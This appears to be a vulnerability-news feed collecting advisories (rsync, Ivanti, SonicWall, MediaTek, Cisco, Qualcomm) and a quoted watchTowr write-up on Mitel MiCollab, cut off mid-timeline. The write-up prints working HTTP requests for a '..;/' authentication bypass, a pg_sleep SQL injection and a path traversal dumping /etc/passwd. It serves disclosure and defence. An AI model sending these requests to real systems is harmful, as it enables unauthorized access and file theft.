As published in https://www.openwall.com/lists/oss-security/2025/01/14/3

Hello OSS-security,

Two independent groups of researchers have identified a total of 6 vulnerabilities in rsync. In the most severe CVE, an attacker only requires anonymous read access to a rsync server, such as a public mirror, to execute arbitrary code on the machine the server is running on.

Upstream has prepared patches for these CVEs. These fixes will be included in rsync 3.4.0 which is to be released shortly.

CVE Details: [1] Heap Buffer Overflow in Rsync due to Improper Checksum Length Handling

CVE ID: CVE-2024-12084

CVSS 3.1: 9.8 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description: A heap-based buffer overflow flaw was found in the rsync daemon. This issue is due to improper handling of attacker-controlled checksum lengths (s2length) in the code. When MAXDIGESTLEN exceeds the fixed SUM_LENGTH (16 bytes), an attacker can write out of bounds in the sum2 buffer.

Affected Versions: >= 3.2.7 and < 3.4.0 Reporters: Simon Scannell from Google, Pedro Gallegos from Google, Jasiel Spelman from Google

Mitigation: Disable SHA* support by compiling with CFLAGS=-DDISABLESHA512DIGEST and CFLAGS=-DDISABLESHA256DIGEST.

[2] Info Leak via Uninitialized Stack Contents

CVE ID: CVE-2024-12085

CVSS 3.1: 7.5 - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Description: A flaw was found in the rsync daemon which could be triggered when rsync compares file checksums. This flaw allows an attacker to manipulate the checksum length (s2length) to cause a comparison between a checksum and uninitialized memory and leak one byte of uninitialized stack data at a time.

Affected Versions: < 3.4.0

Reporters: Simon Scannell from Google, Pedro Gallegos from Google, Jasiel Spelman from Google

Mitigation: Compile with -ftrivial-auto-var-init=zero to zero the stack contents.

[3] Rsync Server Leaks Arbitrary Client Files

CVE ID: CVE-2024-12086

CVSS 3.1: 6.1 - AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:N/A:N

Description: A flaw was found in rsync. It could allow a server to enumerate the contents of an arbitrary file from the client's machine. This issue occurs when files are being copied from a client to a server. During this process, the rsync server will send checksums of local data to the client to compare with in order to determine what data needs to be sent to the server. By sending specially constructed checksum values for arbitrary files, an attacker may be able to reconstruct the data of those files byte-by-byte based on the responses from the client.

Affected Versions: < 3.4.0

Reporters: Simon Scannell from Google, Pedro Gallegos from Google, Jasiel Spelman from Google

[4] Path Traversal Vulnerability in Rsync

CVE ID: CVE-2024-12087

CVSS 3.1: 6.5 - AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Description: A path traversal vulnerability exists in rsync. It stems from behavior enabled by the --inc-recursive option, a default-enabled option for many client options and can be enabled by the server even if not explicitly enabled by the client. When using the --inc-recursive option, a lack of proper symlink verification coupled with deduplication checks occurring on a per-file-list basis could allow a server to write files outside of the client's intended destination directory. A malicious server could write malicious files to arbitrary locations named after valid directories/paths on the client.

Affected Versions: < 3.4.0 Reporters: Simon Scannell from Google, Pedro Gallegos from Google, Jasiel Spelman from Google

[5] --safe-links Option Bypass Leads to Path Traversal

CVE ID: CVE-2024-12088

CVSS 3.1: 6.5 - AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Description: A flaw was found in rsync. When using the --safe-links option, rsync fails to properly verify if a symbolic link destination contains another symbolic link within it. This results in a path traversal vulnerability, which may lead to arbitrary file write outside the desired directory.

Affected Versions: < 3.4.0

Reporters: Simon Scannell from Google, Pedro Gallegos from Google, Jasiel Spelman from Google

[6] Race Condition in Rsync Handling Symbolic Links

CVE ID: CVE-2024-12747

CVSS 3.1: 5.6 - AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N

Description: A flaw was found in rsync. This vulnerability arises from a race condition during rsync's handling of symbolic links. Rsync's default behavior when encountering symbolic links is to skip them. If an attacker replaced a regular file with a symbolic link at the right time, it was possible to bypass the default behavior and traverse symbolic links. Depending on the privileges of the rsync process, an attacker could leak sensitive information, potentially leading to privilege escalation.

Affected Versions: < 3.4.0

Reporters: Aleksei Gorban "loqpa"

Best Regards,

Red Hat Product Security

Nick Tait

He / Him (why? https://medium.com/gender-inclusivit/why-i-put-pronouns-on-my-email-signature-and-linkedin-profile-and-you-should-too-d3dc942c8743 )

Incident Commander - Product Security

https://www.redhat.com https://www.redhat.com

secalert@…hat.com for urgent response. My working hours may not be your working hours. Do not feel obligated to reply outside of your normal work schedule.

Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-0282, CVE-2025-0283)

2 months ago by Alexandre Dulaunoy

Created Date Jan 8, 2025 4:55:55 PM Last Modified Date Jan 8, 2025 6:00:09 PM

Summary

https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-0282-CVE-2025-0283?language=en_US

Ivanti has released an update that addresses one critical and one high vulnerability in Ivanti Connect Secure, Policy Secure and ZTA Gateways. Successful exploitation of CVE-2025-0282 could lead to unauthenticated remote code execution. CVE-2025-0283 could allow a local authenticated attacker to escalate privileges.

A patch is available now, please refer to the table below for each affected product.

We are aware of a limited number of customers’ Ivanti Connect Secure appliances being exploited by CVE-2025-0282 at the time of disclosure. We are not aware of these CVEs being exploited in Ivanti Policy Secure or ZTA gateways.

We are not aware of any exploitation of CVE-2025-0283 at the time of disclosure.

Exploitation of CVE-2025-0282 can be identified by the Integrity Checker Tool (ICT). We strongly advise all customers to closely monitor their internal and external ICT as a part of a robust and layered approach to cybersecurity to ensure the integrity and security of the entire network infrastructure.

Vulnerability Details

CVE Number

Description

CVSS Score (Severity)

CVSS Vector

CWE

CVE-2025-0282

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a remote unauthenticated attacker to achieve remote code execution.

9.0 (Critical)

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE-121

CVE-2025-0283

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, Ivanti Policy Secure before version 22.7R1.2, and Ivanti Neurons for ZTA gateways before version 22.7R2.3 allows a local authenticated attacker to escalate their privileges.

7.0 (High)

CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE-121

Related vulnerabilities: cve-2025-0282 cve-2025-0283

Sonicwall vulnerabilities including critical ones

2 months ago by Alexandre Dulaunoy

Advisory ID	CVSS Score	Advisory Title	Associated CVEs
SNWLID-2025-0003	CVSS Score 8.2	SONICOS AFFECTED BY MULTIPLE VULNERABILITIES	- CVE-2024-40762: SonicOS SSLVPN Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) - CVSS Score 7.1. Use of a weak PRNG in the SonicOS SSLVPN authentication token generator can allow attackers to predict the token, potentially resulting in authentication bypass. - CVE-2024-53704: SonicOS SSLVPN Authentication Bypass Vulnerability - CVSS Score 8.2. - CVE-2024-53705: SonicOS SSH Management Server-Side Request Forgery Vulnerability - CVSS Score 6.5. - CVE-2024-53706: Gen7 SonicOS Cloud NSv SSH Config Function Local Privilege Escalation Vulnerability - CVSS Score 7.8.
SNWLID-2024-0013	CVSS Score 5.3	INTEGER-BASED BUFFER OVERFLOW VULNERABILITY IN SONICOS VIA IPSEC	- CVE-2024-40765: Integer-based buffer overflow vulnerability in SonicOS via IPsec. Allows denial of service and potential execution of arbitrary code. CVSS Score 5.3.
SNWLID-2025-0001	CVSS Score 6.5	SSL-VPN MFA BYPASS DUE TO UPN AND SAM ACCOUNT HANDLING IN MICROSOFT AD	- CVE-2024-12802: SSL-VPN MFA Bypass in SonicWALL SSL-VPN due to separate handling of UPN (User Principal Name) and SAM (Security Account Manager) account names when integrated with Microsoft Active Directory. Allows MFA bypass by exploiting alternative account name handling. CVSS Score 6.5.
SNWLID-2025-0004	CVSS Score 6.0	SONICOS MULTIPLE POST-AUTHENTICATION VULNERABILITIES	- CVE-2024-12803: Post-authentication stack-based buffer overflow vulnerability in SonicOS. CVSS Score 6.0. - CVE-2024-12805: Post-authentication format string vulnerability in SonicOS. CVSS Score 6.0. - CVE-2024-12806: Post-authentication absolute path traversal vulnerability in SonicOS. CVSS Score 4.9.

Source: https://i.imgur.com/VpI6jkI.png

2025-01-05 Android security bulletin - MediaTek components

2 months ago by Cédric Bonhomme

Vulnerabilities affecting MediaTek components and further details are available directly from MediaTek. The severity assessment of these issues is provided directly by MediaTek.

CVE	References	Severity	Subcomponent
CVE-2024-20154	A-376809176	Critical	Modem
CVE-2024-20146	A-376814209	High	wlan
CVE-2024-20148	A-376814212	High	wlan
CVE-2024-20105	A-376821905	High	m4u
CVE-2024-20140	A-376816308	High	power
CVE-2024-20143	A-376814208	High	DA
CVE-2024-20144	A-376816309	High	DA
CVE-2024-20145	A-376816311	High	DA

The user must update the device as soon as possible.

MediaTek January 2025 Product Security Bulletin (severe vulnerability)

2 months ago by Cédric Bonhomme

MediaTek has released its January 2025 Product Security Bulletin: https://corp.mediatek.com/product-security-bulletin/January-2025

Out-of-bounds write vulnerabilities in power management (CVE-2024-20140) and the Digital Audio subsystem (CVE-2024-20143, CVE-2024-20144, CVE-2024-20145). These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.

These vulnerabilities could lead to local privilege escalation, potentially allowing attackers to gain unauthorized access to sensitive data or system functionalities.

Other vulnerabilities addressed include issues in the WLAN driver (CVE-2024-20146, CVE-2024-20148) that could lead to remote code execution and an out-of-bounds write vulnerability in the M4U subsystem (CVE-2024-20105) that could allow for local privilege escalation.

MediaTek has notified device manufacturers (OEMs) about these vulnerabilities and provided corresponding security patches. Users are strongly encouraged to check for updates from their device manufacturers and apply them as soon as possible to mitigate these security risks.

PoC LDAPNightmare: The CVE Mix-Up (as noted by @wdormann@infosec.exchange)

2 months ago by Cédric Bonhomme

A PoC for CVE-2024-49113 titled “Windows Lightweight Directory Access Protocol (LDAP) Denial of Service Vulnerability.” is provided by SafeBreach.

However, there was confusion between CVE-2024-49113 (DoS) and CVE-2024-49112 (RCE - CVSS 9.8), as noted by @wdormann@infosec.exchange:

https://github.com/SafeBreach-Labs/CVE-2024-49113/commit/eb76381b2927ce78c86743267d898b4ebfcbb187

Related vulnerabilities: cve-2024-49113 cve-2024-49112

Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD)

3 months ago by Jean-Louis Huynen

CVE-2024-20353 is a denial-of-service attack that allows a remote, unauthenticated attacker to cause the device to reload unexpectedly, resulting in a denial-of-service condition. CVE-2024-20358 is a command injection attack that allows a local, authenticated attacker with Administrator level privileges to run arbitrary commands as root on the underlying device operating system. CVE-2024-20359 is similar and is an arbitrary code execution attack that allows a local, authenticated attacker with Administrator level privileges to execute arbitrary code as root on the underlying device operating system.

Related vulnerabilities: cve-2024-20359 cve-2024-20353 cve-2024-20358

The Qualcomm DSP Driver - How Serbian authorities have deployed surveillance technology and digital repression tactics

3 months ago by Cédric Bonhomme

Amnesty International identified how Serbian authorities used Cellebrite to exploit a zero-day vulnerability (a software flaw which is not known to the original software developer and for which a software fix is not available) in Android devices to gain privileged access to an environmental activist’s phone. The vulnerability, identified in collaboration with security researchers at Google Project Zero and Threat Analysis Group, affected millions of Android devices worldwide that use the popular Qualcomm chipsets. An update fixing the security issue was released in the October 2024 Qualcomm Security Bulletin.

Related bundle on Vulnerability-Lookup (Patch for Android).

Investigation from Amnesty International

https://github.com/AmnestyTech/investigations/tree/master/2024-12-16serbianovispy

“A Digital Prison”: Surveillance and the suppression of civil society in Serbia

https://securitylab.amnesty.org/latest/2024/12/a-digital-prison-surveillance-and-the-suppression-of-civil-society-in-serbia/

Related vulnerabilities: cve-2024-38402 cve-2024-49848 cve-2024-21455 cve-2024-43047 cve-2024-33060

Vulnerabilities in Mitel MiCollab software

3 months ago by Alexandre Dulaunoy

Where There’s Smoke, There’s Fire - Mitel MiCollab CVE-2024-35286, CVE-2024-41713 And An 0day

It is not just APTs that like to target telephone systems, but ourselves at watchTowr too.

We can't overstate the consequences of an attacker crossing the boundary from the 'computer system' to the 'telephone system'. We've seen attackers realise this in 2024, with hacks against legal intercept systems widely reported in the news.

VoIP platforms, which handle telephone calls for an organization, are a really juicy target for an APT. Imagine being able to listen in on the phone calls of your target, as they're happening - or even to interfere with them and block them at will! It's a very powerful thing to be able to do, and a godsend for an outcome-motivated attacker.

And that's before we even look at less complex attacks used by less sophisticated actors, like the classic 'register-a-premium-rate-number-and-call-it-from-hacked-accounts' scam, or the simple 'phone bombing', in which a target line is rendered unusable by a flood of bogus calls.

It is becoming very clear that specific device categories aren’t being targeted anymore. Instead, there’s a feeding frenzy of exploitation on any and all devices that reside in enterprise DMZ’s. No longer can you rest easy thinking that your less-popular branded device will slip through the radar of the APT!

Today we've got a great vulnerability (or two, or even three, depending what you count as 'a vulnerability') for you. We'll talk about all these in turn:

Reproducing CVE-2024-35286,
Realising we'd found an additional Authentication Bypass vulnerability (CVE-2024-41713),
A post-auth Arbitrary File Read that has not yet been patched

All found in Mitel's MiCollab platform.

CVE-2024-35286

As we're sure you can imagine, keeping on top of the incoming wave of CVE’s and sifting through the trashy vulnerabilities in PHP ‘hair salon booking’ or ‘pizza ordering systems’ which flood our feeds required superhuman strength and patience - but regularly we see gems - like CVE-2024-35286, a critical pre-authenticated SQL injection in Mitel’s MiCollab software (versions 9.8.0.33 and earlier).

This vulnerability - a SQL injection, CVE-2024-35286 - can supposedly

huehuehue

be reached only should a specific configuration be in place to expose the /npm-admin endpoint. No sensible admin would do this, but it's a trace of smoke that might signal a larger fire - we wanted to dive in and see what was going on.

Part of the reason for our keenness was the relatively high value of the MiCollab suite. For those unfamiliar with Mitel in general, they create a wide range of software for large enterprises and governments in the VoIP space, connecting employees on-the-go and providing conference solutions.

One of these is the software suite MiCollab, which boasts over 16,000 instances across the Internet. MiCollab comprises a softphone application deployed to endpoints and a central server component capable of coordinating telephone calls between endpoints and also to the outside world.

It's like a mini telephone exchange, and it boasts the features you'd expect - voicemail, file sharing, and even desktop sharing so that users can show each other what they're doing.

While it's obvious how dangerous compromise of features such as 'desktop sharing' are, there are usually larger dangers exposed by the telephone function itself.

Users often think of phone calls as more secure than textual communication, and so will frequently use voice-based communication for especially sensitive material. Let's not forget the advent of 'deep fake' technology, too, and the potential for voices to be 'cloned', leading to some crazy social engineering takeovers. CFCA, the Communications Fraud Control Association, pegs the annual cost of PBX systems alone at almost 5 billion USD - and that's just according to who responded to their survey, admitting they were compromised.

The real number is likely much higher………………….

Suffice to say, our interest was firmly piqued by the truly catastrophic consequences of various types of telecom fraud, interception, and just general shenanigans.

We pack a bag of tools for the excursion, and we journey into the forest to inspect the source of the smoke.

Our route was initially blocked, as we couldn’t acquire the software without speaking to salespeople (a hacker’s worst nightmare, second only to podcasting nerds who sub-tweet on Twitter), and so we bit the bullet and "ordered a piece of hardware" (funnily enough it came with a watchTowr.nfo).

Assessing The Winds

In the meantime, we looked at the vulnerability's CVE description. We were quite intrigued by the designated component that holds the vulnerability, ‘NuPoint Unified Messaging’:

A SQL injection vulnerability has been identified in NuPoint Unified Messaging (NPM) component of Mitel MiCollab which, if successfully exploited, could allow a malicious actor to conduct a SQL injection attack.

While the "hardware" still hadn’t arrived on our desks, we were keen to try and find the vulnerability in the wild using a more investigatory mindset.

Typically, if the software is available, the first step is to begin to map out the attack surface through Apache configs, web.xml files, and suchlike (as we’ve talked about in our previous blog posts). However, with no software available to us, we looked to ‘open source’ our approach.

A short Google away we discovered a very helpful friend who had dumped the entire Apache config in their quest for technical help over a decade ago. Nice one, Internet Friend!

Whilst the post is from 2009, typical (enterprise) software doesn’t evolve that drastically over time, and we can already correlate paths that can be reached:

When looking at an Apache config, there are several key directives that dictate paths of interest. For example, we’re keen to look at the following:

Location
ProxyPass
RewriteRule
ProxyPassReverse
Alias

To narrow our search, we tried to focus on routes matching the CVE’s affected NuPoint Unified Messaging (NPM) component. It doesn’t take a genius to work out that the following directives are more-than-likely going to be involved:

    # NuPoint Personal Web GUI URL Rewriting (Port 80)
    RewriteEngine on

    RewriteRule ^/index\\.html$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
    RewriteRule ^/login\\.html$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
    RewriteRule ^/npm-pwg$ https://%{HTTP_HOST}/npm-pwg/loginForm.jsp [R]
    RewriteRule ^/npm-pwg/(.*)\\.wav$ <http://127.0.0.1:8080/npm-pwg/$1.wav> [P]
    RewriteRule ^/npm-pwg/(.*)\\.tiff$ <http://127.0.0.1:8080/npm-pwg/$1.tiff> [P]
    RewriteRule ^/npm-pwg/extendedUmPlayMessage.jsp$ <http://127.0.0.1:8080/npm-pwg/extendedUmPlayMessage.jsp> [P]
    RewriteRule ^/npm-pwg/(.*)$ https://%{HTTP_HOST}/npm-pwg/$1 [R]

    ProxyPassReverse /npm-pwg/ <http://127.0.0.1/npm-pwg/>
        ProxyPassReverse /npm-pwg/ <http://127.0.0.1:8080/npm-pwg/>

We discovered that if we access anything under the path /npm-pwg/, we’re redirected to the initial starting point of /portal/. Perhaps this is just a dead end?

Well, when looking at Apache or Java applications, no ‘smoke investigation kit’ is complete without Orange Tsai’s trusty research centering around the input ..;/ , which can result in path normalization and the ability to traverse sub-contexts. Let’s apply Orange’s research to this uncooperative /npm-pwg/ path and see where we end up.

What Is Path Normalization?

To briefly explain Orange Tsai’s amazing research in the context of a Java application residing on Apache/Tomcat, it was discovered that the special syntax ..;/ can be used to truncate paths/traverse out of contexts.

This may all sound a bit confusing, if this is your first time hearing of it. It’s better explained with a straightforward example.

Suppose we have a Tomcat application application.war with a proxy such as Nginx sitting in front of it. A typical config might look like this:

server {
    listen 80;
    server_name your-domain.com;  # Replace with your actual domain

    location / {
        proxy_pass <http://127.0.0.1:8080/application/servlet>;
        proxy_set_header Host $host;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        proxy_set_header X-Forwarded-Proto $scheme;
    }
}

Given the above configuration, all requests to the root of the Nginx server are forwarded to the Tomcat server with the prefix /application/servlet by the proxy_pass rule. Straightforward, right?

With the path normalization technique, we can make a request which lands us in the root of the application server:

GET /..;/test HTTP/1.1
Host: Hostname

This would be akin to making the request directly to the application server, normally exposed only to localhost, and has the net effect of expanding the attack surface by quite an amount. Now, we can reach other servlets, never intended to be accessed by the outside world!

Sample Testing For Normalization

So how do you test for it? If we look at the below Apache configuration line:

ProxyPassReverse /npm-pwg/ <http://127.0.0.1:8080/npm-pwg/>

We can see that any value supplied after the path /npm-pwg/ is proxied to a different application server, residing on http://localhost:8080 (similarly to our example above). We can perform a quick ‘litmus test’ with two URLs, /npm-pwg/..;/ and /watchTowr/..;/, and we see that we get two different 404 pages back for the two URLs, indicating that two different contexts are being reached.

Request:

GET /npm-pwg/..;/ HTTP/1.1
Host: {{Hostname}}

Response:

HTTP/1.1 404 Not Found
Date: Mon, 26 Aug 2024 02:41:06 GMT
Server: Apache-Coyote/1.1
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
Content-Length: 0
Vary: User-Agent

Request:

GET /watchTowr/..;/ HTTP/1.1
Host: {{Hostname}}

Response:

HTTP/1.1 404 Not Found
Date: Mon, 26 Aug 2024 02:42:56 GMT
Server: Apache
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
Content-Length: 315
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
</body></html>

A further ..;/ traversal results in a status code 400, indicative of the context traversal occurring!

So, What Does It All Mean?

Now we’ve confirmed that we’re alive and present within a secondary context, the attack surface has expanded. We can look to see what other routes are present within this context, referring to the trusty list of routes from the original tech support post.

If we look for other routes that reside on the 8080 application server, we can see an interesting path of /npm-admin/ :

ProxyPassReverse /npm-admin/ <http://127.0.0.1:8080/npm-admin/>

When trying to request this route at the root path, like a normal user would, we’re met with a boring status of 401 Unauthorized. However, in conjunction with our traversal, we can reach its content:

GET /npm-pwg/..;/npm-admin/ HTTP/1.1
Host: {{Hostname}}

Oooh, what’s this?!

Using our emergency toolset of 1337 pentester skillz, we poked and prodded the login page for all sorts of SQL injections and struck gold (albeit in a less-sophisticated-than-expected way).

Who would have guessed - this previously-hidden attack surface has a nice SQLi in the username:

POST /npm-pwg/..;/npm-admin/login.do HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 81

subAction=basicLogin&username=admin'||pg_sleep(4)--&password=admin&clusterIndex=0

We’ve found the source of our smoke! This is looking like CVE-2024-35286, which we set out to find. Can we be sure, though? Read on to find out (and find a further 0day!)

CVE-2024-41713 - Embers In The Blaze

We were quite confident we had reproduced CVE-2024-35286, the SQL injection we went looking for - but without the patch to correlate against we couldn’t be sure. We contacted Mitel to confirm our findings, who were quite helpful.

With a prompt response from Mitel’s PSIRT team, they were able to validate our assumption -

Regarding the time-based SQL injection vulnerability, this issue has been addressed and covered in the latest release of MiCollab. We have disclosed this issue through CVE-2024-35286 and issued a security advisory 24-0014.

Great, so our SQL injection finding was CVE-2024-35286 that we were looking for!

However, to our surprise, our approach of using ..;/ was considered unique by Mitel, presenting an entirely different vulnerability altogether. At the time of discovery, no patch was available… a new Authentication Bypass vulnerability had been discovered!

Mitel termed our new prize CVE-2024-41713, and promptly released an advisory to update to the fixed version 9.8.2.12 (or follow specific instructions to mitigate; see the advisory for details).

This is quite a find - we've found that no weird configuration is actually required to exploit the original CVE-2024-35286 vulnerability, and have used our trusty ..;/ bypass to spawn a totally new vulnerability, CVE-2024-41713 (see below for remediation advice).

With this new knowledge in hand, we wanted to discover how much further we could go on an unpatched device!

Hardware Accelerant Arrives

Fortunately for us, at this point in our research, the "appliance" itself arrived on our doorstep, ready to be torn apart. Extracting the source code and the software had some hurdles to overcome but we’ll save those for another day.

For those playing along at home, or just trying to outdo us (be our guest, the more vulnerabilities the merrier!), we did our testing on version "9.8 SP1 FP2 (9.8.1.201)".

With a quick find command for war files, we were quick to ascertain that the context being traversed into via ..;/ landed us into a Tomcat server running from the path /var/lib/tomcat7/webapps/**.

Interestingly enough, there’s a plethora of war files that can be reached from this perspective, including:

WAR File
awcPortlet
awv
axis2-AWC
Bulkuserprovisioning
ChangePasscodePortlet
ChangePasswordPortlet
ChangeSettingsPortlet
LoginPortlet
massat
MiCollabMetting
npm-admin
npm-pwg
portal
ReconcileWizard
SdsccDistributionErrors
UCAProvisioningWizard
usp

Just by making a request to the war file axis2-AWC we can access, from a pre-authenticated perspective, the Axis console and its related services:

Request:

GET /npm-pwg/..;/axis2-AWC/services/listServices HTTP/1.1
Host: {{Hostname}}

Oof! Each war file comes with access to various administration consoles, allowing all sorts of nasty techniques to be executed by malicious users - ranging from extracting sensitive information, through creation or modification of users, to a simple denial of service.

FIRE FIRE FIRE - 0day Time!

Whilst poking through the ashes of fresh (and at the time, 0day and unpatched) Authentication Bypass vulnerability, we stumbled across a shiny war file that looked interesting - ReconcileWizard .

Upon first glance it appears to hold functionality for viewing and saving system reports from the underlying software - nothing particularly interesting.

Just naturally going through the process of clicking buttons and proxying requests we can see references to hardcoded file names embedded in URL-encoded XML data.

We tried our luck with injecting path traversals within the reportName tag - and what do you know, we’re able to navigate to that sweet, sweet /etc/passwd file:

POST /npm-pwg/..;/ReconcileWizard/reconcilewizard/sc/IDACall?isc_rpc=1&isc_v=&isc_tnum=2 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Content-Length: 716

_transaction=<@urlencode_all><transaction xmlns:xsi="<http://www.w3.org/2000/10/XMLSchema-instance>" xsi:type="xsd:Object"><transactionNum xsi:type="xsd:long">2</transactionNum><operations xsi:type="xsd:List"><elem xsi:type="xsd:Object"><criteria xsi:type="xsd:Object"><reportName>../../../etc/passwd</reportName></criteria><operationConfig xsi:type="xsd:Object"><dataSource>summary_reports</dataSource><operationType>fetch</operationType></operationConfig><appID>builtinApplication</appID><operation>downloadReport</operation><oldValues xsi:type="xsd:Object"><reportName>x.txt</reportName></oldValues></elem></operations><jscallback>x</jscallback></transaction><@/urlencode_all>&protocolVersion=1.0&__iframeTarget__=x

HTTP/1.1 200 OK
Date: Tue, 09 Jul 2024 16:10:03 GMT
Server: Apache-Coyote/1.1
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=63072000; includeSubdomains
content-disposition: attachment; filename=../../../etc/passwd
Content-Type: application/javascript;charset=UTF-8
Set-Cookie: JSESSIONID=093D9A50B17E6E3743DC8F075FD58B89; Path=/; Secure; HttpOnly
Vary: Accept-Encoding,User-Agent
Content-Length: 3239

root:x:0:0:root:/root://bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
alias:x:400:400::/var/qmail/alias:/bin/false
qmaild:x:401:400::/var/qmail:/bin/false
qmaill:x:402:400::/var/qmail:/bin/false
qmailp:x:403:400::/var/qmail:/bin/false
qmailq:x:404:401::/var/qmail:/bin/false
qmailr:x:405:401::/var/qmail:/bin/false
qmails:x:406:401::/var/qmail:/bin/false
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
[TRUNCATED]

Arbitrary File Read ahoy! - clearly, there’s a lot of fire here in these newly-exposed servlets.

Without diving through the other war files just yet, we can safely celebrate that Arbitrary File Read is ours! We've only been inside the first war file for 10 minutes, and we're already stumbling into new vulnerabilities; if only bug hunting could always be this easy.

In an effort to dampen the flames, we contacted Mitel again on August 26th to disclose this Arbitrary File Read vulnerability. They informed us on October 12th of their plans to patch, which they scheduled for the first week of December 2024. Unfortunately, we're past this period and have not seen any updates on Mitel's Security Advisory page.

Since our disclosure email was sent over 100 days ago, we've decided to proceed and include this vulnerability within our blog post—but as of writing, it remains unpatched (albeit post-auth).

Proof-of-Concept exploit

Of course, a watchTowr blog post wouldn't be complete without an Interactive Artifact Generator—check out our shiny PoC exploit!

This PoC combines two vulnerabilities - firstly, the as-yet-unnamed Arbitrary File Read, which would normally require authentication, and secondly, the original Authentication Bypass vulnerability tracked as CVE-2024-41713.

Below demonstrates the exploit dumping the /etc/passwd file - take a look at it in action:

Extinguishing The Flames

With regards to the Authentication Bypass vulnerability, Mitel was quick to issue us with a draft security advisory, indicating that our new CVE-2024-41713 has a critical impact on MiCollab versions 9.8 SP1 (9.8.1.5) and earlier (see the advisory and patches). Users are urged to update to 9.8 SP2 (9.8.2.12) as soon as possible.

As demonstrated - it was fairly trivial to gain access to all sorts of administrative war files. Honestly, our attention spans are brief, and we just haven’t managed to dive too deep into these war files - the reality of discovering the Arbitrary File Read vulnerability while preparing this blogpost tells us that this is not the end of the road for this Mitel solution.

While Mitel's PSIRT team was quick to remediate the Authentication Bypass vulnerability, as of the time of writing and publishing this blog post, Mitel has exceeded our 90-day vulnerability disclosure window regarding the Arbitrary File Read issue. Given that it requires authentication to exploit, and that it isn't really worthy of a blog post on it's own, we're disclosing it here.

Mitel informed us on October 12th 2024 that a patch would be due the 'first week of December', but as mentioned and keenly reiterated - we’re yet to see any movement on their security advisory page.

It may go without saying that it shouldn't be easy to compromise a communications system. Gone are the days of 'plain old' telephone lines, running ATM or some other guaranteed-bandwidth TDM protocol to achieve high-availability - everything nowadays goes over IP. While this obviously brings great convenience in administration, it also risks exposing all those soft squishy protocols that were formerly only accessible from privileged network positions right to the doorstep of sophisticated attackers. Some might opine that vendors need to be more mindful of the real value of the data their servers are carrying and secure it appropriately.

On a more technical level, this investigation has demonstrated some valuable lessons. Firstly, it has acted as a real-world example that full access to the source code is not always needed —even when diving into vulnerability research to reproduce a known weakness in a COTS solution. Depending on the depth of the CVE description, some good Internet search skills can be the basis for a successful hunt for vulnerabilities.

For those concerned in the audience, we are sorry in advance for disclosing this Google search technique to the ransomware gangs and APT groups that may read blogposts that sit on the Internet. We know that sharing this Google search technique meets your bar of enabling criminals, and we are sorry.

Much like our previous dive into the Ivanti Connect Secure SSLVPN, where we discovered an XXE in their SSLVPN, we’re reminded that ‘where there’s smoke, there’s fire’ and more vulnerabilities to be found. Even a slight whiff of wood burning in the ether can be enough to attract our attention and warrant further investigation.

Here at watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Continuous Automated Red Teaming and Attack Surface Management solution, please get in touch.

Timeline

Date: 29th May 2024
Detail: Authentication Bypass and SQL Injection vulnerabilities discovered
Date: 29th May 2024
Detail: Vulnerabilities disclosed to Mitel PSIRT
Date: 30th May 2024
Detail: watchTowr hunts through client attack surfaces for impacted systems, and communicates with those affected
Date: 14th June 2024
Detail: Mitel acknowledges our replication of CVE-2024-35286 (SQL Injection) and begins investigating the Authentication Bypass vulnerability
Date: 30th July 2024
